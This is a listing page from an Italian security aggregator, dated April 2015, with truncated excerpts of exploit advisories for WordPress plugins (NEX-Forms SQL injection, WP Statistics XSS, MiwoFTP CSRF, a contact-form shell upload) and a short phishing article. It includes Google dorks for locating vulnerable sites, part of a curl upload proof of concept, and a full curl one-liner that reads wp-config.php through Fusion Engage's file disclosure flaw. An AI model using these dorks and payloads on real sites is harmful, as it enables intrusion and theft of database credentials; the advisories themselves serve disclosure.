WordPress NEX-Forms 3.0 SQL Injection inurlbr

24 aprile 2015 - Fonte: http://www.mondounix.com
  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Exploit name:  MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability
  # Type:          SQL Injection
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability...

Leggi il seguito »

WordPress NEX-Forms 3.0 SQL Injection SQLMAP

24 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
 
 
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
 
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
 
# Date : 2015-03-29
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
#...

Leggi il seguito »

WordPress Add Link to Facebook Stored Cross Site Scripting

23 aprile 2015 - Fonte: http://www.mondounix.com
Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin
 
Author: Rohit Kumar
 
Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/
 
Severity: Medium
 
Version Affected: Version 1.215 and mostly prior to it.
 
Version Tested: Version 1.215
 
Version Patched : 1.215
 
Description:
 
Vulnerable Parameter
1. App ID
2. App Secret
3. Custom Picture URL
4. Default Picture URL
5. URL News Feed Icon
 
About Vulnerability
This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user
accessed to “Add Link to Facebook” Settings in Wordpress with Administrator privileges. A malicious
administrator can hijack...

Leggi il seguito »

WordPress WP Statistics 9.1.2 Cross Site Scripting

22 aprile 2015 - Fonte: http://www.mondounix.com
===========================================================
Stored XSS Vulnerability in WP Statistics  Wordpress Plugin 
===========================================================
 
. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in WP Statistics Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/wp-statistics/
* Severity: Medium
* Version Affected: 9.1.2 and mostly prior to it
* Version Tested : 9.1.2
* version patched: 9.1.3
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Check for online users every:
*  Coefficient per visitor:
 
 
About Vulnerability
-------------------
This...

Leggi il seguito »

WordPress MiwoFTP 1.0.5 CSRF Command Execution

22 aprile 2015 - Fonte: http://www.mondounix.com
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery
remote code execution vulnerability. The application allows users
to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to
perform certain actions like executing arbitrary PHP code by uploading
a malicious PHP script file, with administrative privileges, if a
logged-in user visits a malicious...

Leggi il seguito »

WordPress MiwoFTP 1.0.5 Cross Site Request Forgery

22 aprile 2015 - Fonte: http://www.mondounix.com
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: Input passed to the 'selitems[]' parameter is not properly
sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
 
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                  ...

Leggi il seguito »

WordPress Video Gallery 2.8 SQL Injection

22 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
 
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
 
 
# Date : 2015-04-04
 
# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Video Gallery 2.8 suffers from SQL injection
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense'...

Leggi il seguito »

WordPress N-Media Website Contact Form 1.3.4 Shell Upload

22 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload"...

Leggi il seguito »

Sicurezza informatica, tecnica del Phising.

19 aprile 2015 - Fonte: http://softwareimparo.blogspot.com/
Negli ultimi anni abbiamo visto una crescita esponenziale delle nuove tecnologie informatiche, siamo completamente dipendenti dai vari apparecchi elettronici in circolazione tanto che si è sviluppata una nuova paura, la nomofobia, ossia la paura di rimanere senza smartphone. Nell'articolo di oggi introdurrò il concetto di sicurezza informatica. Con l'espandersi della telecomunicazione in varie forme, sono moltiplicate esponenzialmente anche le tecniche utilizzate dalle persone al fine di "fregare" le persone, si parla di ingegneria sociale la quale si occupa di far compiere all'utente operazioni non desiderate.
E' proprio grazie all'ingegneria sociale che spesso ci becchiamo dei virus (utilizzo questo termine nonostante esso è in disuso, ci sono malware molto più raffinati) senza neanche...

Leggi il seguito »

WordPress Fusion Engage Local File Disclosure

16 aprile 2015 - Fonte: http://www.mondounix.com
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has a LFD. Here's the relevant code..
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
    }add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...

Leggi il seguito »